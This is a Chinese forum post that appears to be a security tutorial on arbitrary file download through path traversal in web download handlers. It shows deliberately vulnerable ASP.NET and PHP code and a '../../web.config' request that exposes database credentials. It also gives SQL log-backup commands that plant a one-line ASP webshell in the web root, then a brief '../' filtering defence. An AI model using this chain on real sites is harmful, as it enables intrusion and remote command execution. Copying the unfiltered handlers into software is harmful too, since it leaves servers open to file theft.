-
-
[分享]Web文件操作脆弱性-----下载文件功能
-
发表于:
2011-11-1 09:15
5880
-
[分享]Web文件操作脆弱性-----下载文件功能
Web脆弱性有很多种,本人也无法穷尽,本文主要是讲一下web站点实现下载文件中可能存在的问题。技术性比较差,大牛请飘过…
对于web实现下载文件功能的方法有很多种,其中有一种方法直接将文件以字节流形式,发送给客户端,而文件的路径是通过参数传入,如果此时对传入参数没有进行过滤,则可能导致下载任意文件。
该功能的asp.net代码类似如下形式:
try
{
string filename = HttpUtility.UrlDecode(Request.QueryString["filename"].ToString());
string filePath = Server.MapPath("upfile/" + filename);//路径
//以字符流的形式下载文件
System.IO.FileStream fs = new FileStream(filePath, FileMode.Open);
byte[] bytes = new byte[(int)fs.Length];
fs.Read(bytes, 0, bytes.Length);
fs.Close();
Response.ContentType = "application/octet-stream";
//通知浏览器下载文件
Response.AddHeader("Content-Disposition", "attachment; filename=" + HttpUtility.UrlEncode(fs.Name, System.Text.Encoding.UTF8));
Response.BinaryWrite(bytes);
Response.Flush();
Response.End();
}
catch
{
Response.Write("<script>alert('资料不存在!');history.back();</script>");
return;
}
上述代码没有对filename参数进行过滤,导致可以下载任意文件.这个脆弱性对于asp.Net站点是非常致命,因为在asp.net站点下有网站的配置文件web.config,通常该文件中保存着连接数据库的用户名和密码,如果获得此信息,并且远程数据库可以远程访问,那么就可以直接登录远程数据库,通过数据库的差异备份等功能就可以获得webshell.下面简单操作一下这个过程:
首先下载网站配置文件web.config
http://www.example.org/DownLoadFileLow.aspx?FileName=../../web.config
由于下载路径通常不是网站的根目录需要使用../回溯到网站的根目录,具体是几级回溯,需要根据具体的网站而定,这个只能是尝试,本人没有想出好的方法.
打开配置文件获得数据库连接字符串:
<add key="ConnectionStringSQL"
value="server=www.example.org;database=Dbicid2011;uid=Dbicid2011;pwd=ici48736;initial catalog=Dbicid2011" />
登录到远程数据库,使用log备份获得一句话木马:
use Dbicid2011--
drop table cmd--
alter database Dbicid2011 set recovery full--
create table cmd (a image)--
backup log Dbicid2011 to disk='D:\domains\icid2011\wwwroot\datafiles\RegistrationFiles\cmd.bak' with init --
insert into cmd (a) values(0x3C256578656375746520726571756573742822636D64222920253E)--<%execute request("cmd") %>
backup log Dbicid2011 to disk='D:\domains\icid2011\wwwroot\yxy.asp'—
(注:至于如何根据数据库获得web的绝对目录,就不再赘述)这样就完成了一次简单的渗透过程.
漏洞危害:
此漏洞危害是不言而喻的,即使远程数据库是内网数据库或者不能远程连接,该漏洞也可以使得攻击者下载任意web源文件.大大降低攻击的难度。
防范方法:
对于防范其它很简单,正常的filename参数中是不会包含../字符,(因为大部分情况下载文件在单独的一个目录中,不是网站的根目录,要想下载任意文件必须使用../回溯)只要检查参数中是否包含../,如果包含基本上就可以肯定是非法请求,直接提示,拒绝下载即可。
上述只是以asp.net为例,其实对于其它脚本也是一样,如php脚本实现该功能代码如下:
<?php
// downloading a file
$filename = $_GET['filename'];
header("Pragma: public");
header("Expires: 0"); // set expiration time
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Content-Type: application/force-download");
header("Content-Type: application/octet-stream");
header("Content-Type: application/download");
header("Content-Disposition: attachment; filename=".($filename).";");
header("Content-Transfer-Encoding: binary");
header("Content-Length: ".filesize($filename));
readfile("$filename");
echo basename($filename);
exit();
?>
基本功能类似,同样存在该问题,但是php的数据库连接文件不是固定的,需要下载几个文件才能找到,并且一般站点的mysql不允许远程连接,与上面的渗透方式有些不同,但是也可以下载源码或者系统其它配置信息,危害也已经很大了。具体的渗透过程和防范方法与上面类似,再此不在赘述。
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!